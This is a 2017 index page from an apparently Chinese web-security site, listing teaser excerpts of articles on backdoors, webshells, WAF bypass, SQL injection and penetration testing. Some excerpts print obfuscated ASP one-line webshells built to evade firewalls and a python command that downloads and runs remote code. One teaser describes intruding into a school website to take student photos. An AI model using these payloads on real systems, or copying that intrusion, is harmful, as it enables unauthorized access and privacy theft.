- AppDomainManager后门的实现思路
- 0x00 前言
从Casey Smith@subTee学到的一个技巧:针对.Net程序,通过修改AppDomainManager能够劫持.Net程序的启动过程。
如果劫持了系统常见.Net程序如powershell.exe的启动过程,向其添加payload,就能实现一种被......
- 所属分类:网站安全 更新时间:2017-06-22 相关标签: 阅读全文...
- 大神实战入侵王者荣耀钓鱼网站
- 那是一个阳光明媚的中午,我躺在寝室掏出手机,打开了王者荣耀准备开撸。。。。突然。。看到一条消息。。。让我百度上找全服备战宝箱。。送荆轲,当时。。。。。我熟练的打开uc浏览器:)不是广告。。然后开始了。各位......
- 所属分类:网站安全 更新时间:2017-06-20 相关标签: 阅读全文...
- 一句话木马(webshell)是如何执行命令的
- 在很多的渗透过程中,渗透人员会上传一句话木马(简称webshell)到目前web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是如何执行的呢,下面我们就对webshell进行一个简单的......
- 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
- 记一波搞事日记(小小思路日常笔记)
- 6.1安全法出台 各位不要乱搞事情很危险
一.确定目标网站 (**县一中)二.确定进入目的(相信看过我帖子的小伙伴都知道 就是为了点学生照片而已)三.确定进入思路百度搜索了 **县一中网址http://www.**yz.net/ 各位大佬勿......
- 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
- 过狗版php一句话
- 几个变性的asp–过防火墙 过狗效果都不错
1 <%Y=request("x")%> <%execute(Y)%>
1 <%eval (eval(chr(114)+chr(101)+chr(113)+chr(117)+chr(101)+chr(115)+chr(116))("sz"))%>
这个是90sec发的
1 <%eval""......
- 所属分类:网站安全 更新时间:2017-06-18 相关标签: 阅读全文...
- 暗云Ⅲ危害——不仅仅是DDoS
- 0×00概况
前面对暗云的分析报告中,腾讯电脑管家 安全团队 基本摸清暗云Ⅲ的感染方式和传播方式,也定位到被感染暗云Ⅲ的机器会在启动时从服务端下载任务脚本包——ndn.db文件,且该文件会常进行更换。此......
- 所属分类:网站安全 更新时间:2017-06-13 相关标签: 阅读全文...
- 如何通过 SSH 隧道进行域渗透的 PtT 攻击
-
前言
如果我们在渗透过程中能够拿到用户的 TGT,并能将其导入到内存,那么就可以冒充该用户获得其访问权限,这就是 Pass the ticket(PtT)。PtT 技术使用 Kerberos ticket 来代替明文密码或 NTLM 散列。大多数......
- 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
- 深度追踪WannaCry源头轶事
- 注1:基于隐私问题,本文中隐去黑客相关信息,如有关部门需要,请与腾讯反病毒实验室联系。
注2 : 自WannaCry爆发以来,腾讯反病毒实验室一直在深入跟进整体传播态势,通过各种渠道,汇集各类信息 , 努力深挖敲诈......
- 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
- 论二级域名收集的各种姿势
-
测试dns域传送
测试方式如图:
当然,这种方式不一定都能成功,但也不失为一种获取二级域名的方式。
反查whois
工具:站长工具
1 查询whois http://whois.chinaz.com/baidu.com
2 反查whois http://whois.......
- 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
- 安全小故事之“你不仁,我不义”
- 最近某互联网公司的员工小刘很是郁闷,因为自己的粗心,与客户签订的合同价格少写了一个0,造成了公司的巨大损失,经公司高层讨论决定开除小刘。但是小刘认为自己的合同是经领导检查通过,不应该由自己负全部责任,......
- 所属分类:网站安全 更新时间:2017-06-12 相关标签: 阅读全文...
- 服务端注入之Flask框架中服务端模板注入问题
- Flask 是python语言编写的轻量级的MVC (也可以称为MTV, T: Template)框架
具体详见
http://docs.jinkan.org/docs/flask/
对于Flask 框架本身,本文不做讨论。
本文主要通过几个例子,测试说明下Flask框架中服务......
- 所属分类:网站安全 更新时间:2017-06-05 相关标签: 阅读全文...
- 针对MSSQL弱口令实战流程梳理与问题记录
- 1. 端口发现
1.1. 常用工具推荐
常用端口扫描工具,其实很多这里不做过多的说明,本人还是以经典好用的nmap进行实际操练。
nmap
nmap工具的下载,请直接去其官方网站下载即可。
ssport
ssport 是个简单快速的......
- 所属分类:网站安全 更新时间:2017-06-05 相关标签: 阅读全文...
- 一款强大的WordPress漏洞利用框架 – WPXF
-
今天给大家介绍的工具是一款Ruby框架,该框架采用模块化开发,旨在帮助安全研究专家对基于WordPress的网站和系统进行渗透测试工作。
工具下载:【 GitHub主页 】
工具运行要求
确保你系统中安装的Ruby版本>=2.2......
- 所属分类:网站安全 更新时间:2017-06-03 相关标签: 阅读全文...
- 如何使用kali的Searchsploit查找软件漏洞
- Searchsploit
Searchsploit会通过本地的exploit-db, 查找软件漏洞信息
打开kali的命令行, 输入:
searchsploit
查看系统帮助
查找mssql的漏洞
如果要查找 mssql的漏洞, 命令如下, 会找到所有和mssql相......
- 所属分类:网站安全 更新时间:2017-06-03 相关标签: 阅读全文...
- 看我如何使用数据格式混淆来绕过WAF进行攻击?
- 这个问题目前是没有成功解决,因为解析相关数据类型需要进行准确的流量分析。很多防火墙只是采用了一些很简单的方法对这些数据进行处理。在处理HTTP协议中,常见简单方法如下:
1. 使用Content-Type HTTP标头进行......
- 所属分类:网站安全 更新时间:2017-06-02 相关标签: 阅读全文...
- 如何在PE文件中手动植入一个后门
- 一、简介
1.1 什么是后门
在本文中,后门植入指的是使看似无害的可执行文件(即PE文件,Portable Executable)执行恶意载荷的一种技术。包括启动calc.exe、添加用户账户以及获取远程shell等都可以算是恶意载荷。任......
- 所属分类:网站安全 更新时间:2017-06-02 相关标签: 阅读全文...
- autossh 通过外网穿透内网实验测试
- 摘要: 前几天朋友有一个需求,说是如何从外网访问内网OA系统,但是没有路由器的权限,所以我在想如果能拿到路由器的权限做个端口映射不就行了,但是有时候人家就是不给你映射,咋的。下来做个实验不用路由器的映射来......
- 所属分类:网站安全 更新时间:2017-05-30 相关标签: 阅读全文...
- webshell的另一用途
- 不知道大家都用不用www.yas*.com,旧版是www.bug.net。挂载各种插件,不过扫描要添加在线引擎节点。
你也可以自己电脑执行python -c "exec(__import__('urllib').urlopen('http://www.yascr.com/xxxxxyyyyyzzzzzz')......
- 所属分类:网站安全 更新时间:2017-05-29 相关标签: 阅读全文...
- 如何使用谷歌Chrome浏览器窃取Windows密码
-
写在前面的话
利用Windows操作系统的SMB文件共享协议来窃取身份凭证的攻击技术长久以来都一直存在,这是一个难以避免的问题。虽然这种技术有多种实现方式,但大多都局限于本地网络内。在过去的十多年里,还......
- 所属分类:网站安全 更新时间:2017-05-25 相关标签: 阅读全文...
- NodeJs的包漏洞扫描与漏洞测试攻击
- 一个典型的Node应用可能会有几百个,甚至上千个包依赖(大部分的依赖是间接的,即下载一个包,这个包会依赖其他的好多包),所以最终的结果是,应用程序就会像是这个样子的:
和所依赖的包相比,自己写的代码量就......
- 所属分类:网站安全 更新时间:2017-05-25 相关标签: 阅读全文...
- Acesss数据库手工绕过通用代码防注入系统
- 渗透过程就是各种安全技术的再现过程,本次渗透从SQL注入点的发现到绕过sql注入通用代码的防注入,可以说是打开了一扇门,通过sql注入获取管理员密码,获取数据库,如果在条件允许的情况下是完全可以获取webshell。在......
- 所属分类:网站安全 更新时间:2017-05-22 相关标签: 阅读全文...
- 从目录信息泄露到渗透内网
- 1.目录信息泄露
目录信息泄露是指当当前目录无index.html/index.asp/index.php/index.asp.net等指定主页的情况下,直接显示目录下所有的文件及其目录。测试方法和简单,在网站路径后输入目录名称即可,一般的扫描软......
- 所属分类:网站安全 更新时间:2017-05-22 相关标签: 阅读全文...
- 渗透测试02------查点总结
- 一:最基本的标语抓取技术
使用telnet和netcat
telnet: 1. 在CMD中输入telnet www.myhack58.com 80 回车
2. 然后屏幕应该是全黑,然后按CTRL+] ,然后回车,又是一片黑
3. 输入 GET / HTTP/1.1 回车 继......
- 所属分类:网站安全 更新时间:2017-05-21 相关标签: 阅读全文...
- 渗透测试01------踩点加扫描总结
- 一:踩点
踩点是渗透测试的第一步也是尤为总要的一步,知其知彼方能百战百胜,能够从对方最薄弱的地方进去为啥还要去挑战困难呢?
踩点我们需要了解对方越多越好,比如:域名,网络地址块和子网,服务器IP地址,......
- 所属分类:网站安全 更新时间:2017-05-21 相关标签: 阅读全文...
- CVE-2017-7269写shell思路与综合利用工具
- iis6 webdav漏洞在有些时候还是很好用的,例如说内网某些老旧的机器上。
只可惜利用方式太不友好,msf这种庞然大物用在web上真的是一点也不贴切。
iis支持各种脚本,如果能写webshell就再好不过了。
0x01 查找物理......
- 所属分类:网站安全 更新时间:2017-05-19 相关标签: 阅读全文...
- 某云用户网站入侵应急响应
- 1 情况概述
该案例是前期应急处置的一起因安全问题导致的内网不稳定的情况。写下来,和大家一起讨论应急响应的一些思路及其中间遇到的一些坑,欢迎大牛指点、讨论。
情况是这样的:某用户发现在网络经常出现内网中......
- 所属分类:网站安全 更新时间:2017-05-16 相关标签: 阅读全文...
- 如何绕过WAF/NGWAF的libinjection实现SQL注入
- 在我们开始之前,先给大家介绍一下libinjection。libinjection是一个非常流行的开源项目【传送门】,该项目由Signal Sciences公司的Nick Galbreath负责开发和维护。
在此之前,市场上绝大多数的WAF都是基于正则匹配......
- 所属分类:网站安全 更新时间:2017-05-16 相关标签: 阅读全文...